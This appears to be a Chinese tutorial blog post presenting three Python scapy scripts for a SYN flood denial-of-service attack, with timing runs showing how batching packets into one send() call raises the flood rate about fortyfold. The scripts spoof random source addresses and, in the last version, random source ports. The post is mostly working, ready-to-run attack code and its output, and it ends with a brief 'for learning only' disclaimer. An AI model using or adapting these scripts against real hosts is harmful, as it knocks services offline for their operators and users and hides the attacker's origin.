在一个send函数中同时发送多个syn包是提高syn洪水攻击效率的关键,下面将给出一个简单的例子。
常规的写法(使用for循环反复调用send函数发包):
#demo.py
#written by Matriller
from scapy.all import IP, TCP, send
from random import randint
#用于计时,不是攻击中的必须组件
from time import time
def randip():
    '''
    Return a random dotted-quad IPv4 string, used as a forged source address.

    The first three octets are drawn from 0-255 and the last from 1-255,
    each independently via randint.
    '''
    octets = []
    for _ in range(3):
        octets.append(str(randint(0, 255)))
    # The final octet starts at 1, so the result never ends in ".0".
    octets.append(str(randint(1, 255)))
    return '.'.join(octets)
def attack(dst, dport, amount):
    '''
    Send one SYN packet to dst:dport `amount` times, one send() call per packet.

    The packet is built once before the loop and never changed, so every
    transmission carries the same forged source address. Apart from dport,
    the TCP layer is left at scapy's defaults.
    '''
    # Packet construction is not the focus of this demo: build the simplest
    # packet once and reuse it unchanged.
    ip_layer = IP(src=randip(), dst=dst)
    tcp_layer = TCP(dport=dport)
    syn = ip_layer / tcp_layer

    # Baseline variant: a separate send() call for every packet.
    for _ in range(amount):
        send(syn)
if __name__=="__main__":
    # Number of packets sent in this timing run.
    amount = 1000
    start_time = time()
    # 192.168.1.1 is an RFC 1918 private address; 80 is the destination port.
    attack("192.168.1.1", 80, amount)
    # The interval covers everything attack() does, packet construction included.
    use_time = time() - start_time
    # Prints total wall-clock seconds, then the average per packet.
    print(use_time, use_time/amount)
结果为:
┌──(matriller㉿Hack)-[~/桌面/Hack]
└─$ sudo python demo.py
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
(中间略)
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
34.551655292510986 0.03455165529251099
平均用时为:0.03455165529251099秒
改进后的写法(将包复制后用单个send函数发包):
#demo2.py
#written by Matriller
from scapy.all import IP, TCP, send
from random import randint
#用于计时,不是攻击中的必须组件
from time import time
def randip():
    '''
    Return a random dotted-quad IPv4 string, used as a forged source address.

    The first three octets are drawn from 0-255 and the last from 1-255.
    '''
    # Lower bound per octet, in order; the upper bound is always 255.
    lower_bounds = (0, 0, 0, 1)
    return '.'.join([str(randint(low, 255)) for low in lower_bounds])
def attack(dst, dport, amount):
    '''
    Send `amount` copies of one SYN packet to dst:dport in a single send() call.

    The packet is built once, so every copy carries the same forged source
    address. Apart from dport, the TCP layer is left at scapy's defaults.
    '''
    # Packet construction is not the focus of this demo: build the simplest
    # packet once and reuse it unchanged.
    ip_layer = IP(src=randip(), dst=dst)
    tcp_layer = TCP(dport=dport)
    syn = ip_layer / tcp_layer

    # Replicate the packet `amount` times and pass the whole batch to one
    # send() call instead of calling send() per packet.
    batch = syn * amount
    send(batch)
if __name__=="__main__":
    # Number of packets sent in this timing run.
    amount = 1000
    start_time = time()
    # 192.168.1.1 is an RFC 1918 private address; 80 is the destination port.
    attack("192.168.1.1", 80, amount)
    # The interval covers everything attack() does, packet construction included.
    use_time = time() - start_time
    # Prints total wall-clock seconds, then the average per packet.
    print(use_time, use_time/amount)
结果为:
┌──(matriller㉿Hack)-[~/桌面/Hack]
└─$ sudo python demo2.py
........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Sent 1000 packets.
0.8448374271392822 0.0008448374271392823
平均用时为:0.0008448374271392823秒
第一种写法的平均发包时间比第二种慢了0.033706817865371705秒,约是第二种的40.9倍;总用时慢了33.706817865371704秒,倍数同上。只能说没有对比就没有伤害😜
改进版(大量发送不同的syn包):
只需要将syn包放在列表或元组中传给send函数即可,效果与上面第二种写法一样。
#demo3.py
#written by Matriller
from scapy.all import IP, TCP, send
from random import randint
#用于计时,不是攻击中的必须组件
from time import time
def randip():
    '''
    Return a random dotted-quad IPv4 string, used as a forged source address.

    The first three octets are drawn from 0-255 and the last from 1-255.
    '''
    first = randint(0, 255)
    second = randint(0, 255)
    third = randint(0, 255)
    # The final octet starts at 1, so the result never ends in ".0".
    last = randint(1, 255)
    return '.'.join((str(first), str(second), str(third), str(last)))
def randport():
    '''
    Return a random port number in 1-65535, used to vary the source port.
    '''
    # Ports span 0-65535; 0 is generally not used, so the range starts at 1.
    port = randint(1, 65535)
    return port
#
def reset(pkt):
    '''
    Overwrite the source address and source port of a complete SYN packet.

    The IP and TCP layers are looked up on `pkt` and modified in place, so the
    caller's packet changes too. Returns the result of `ip_layer / tcp_layer`.
    '''
    # scapy exposes the layers of a packet through dict-style lookup.
    ip_layer, tcp_layer = pkt["IP"], pkt["TCP"]
    ip_layer.src = randip()
    tcp_layer.sport = randport()
    return ip_layer / tcp_layer
def attack(dst, dport, amount):
    '''
    Send `amount` SYN packets to dst:dport in a single send() call, with the
    source address and source port re-randomised for each packet by reset().
    '''
    # Initial template packet; reset() rewrites its src and sport on each pass.
    template = IP(src=randip(), dst=dst) / TCP(sport=randport(), dport=dport)

    # Collect the per-packet results of reset() and hand the whole list to
    # one send() call.
    pkt_list = []
    for _ in range(amount):
        pkt_list.append(reset(template))
    send(pkt_list)
    # The same list can be built with a comprehension,
    #     [reset(template) for _ in range(amount)]
    # The author measured no significant performance difference between the
    # two forms; the explicit loop is spelled out for readability.
if __name__=="__main__":
    # Number of packets sent in this timing run.
    amount = 1000
    start_time = time()
    # 192.168.1.1 is an RFC 1918 private address; 80 is the destination port.
    attack("192.168.1.1", 80, amount)
    # The interval covers everything attack() does, including building the
    # list of packets before send() is called.
    use_time = time() - start_time
    # Prints total wall-clock seconds, then the average per packet.
    print(use_time, use_time/amount)
运行结果:
┌──(matriller㉿Hack)-[~/桌面/Hack]
└─$ sudo python demo3.py
........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Sent 1000 packets.
1.1187617778778076 0.0011187617778778075
wireshark截图:
因为要构造不同的syn包,所以用时比第二种写法略有增加,但性能依然比第一种写法(逐个调用send)好得多。
(本文仅供学习,禁止进行违法行为)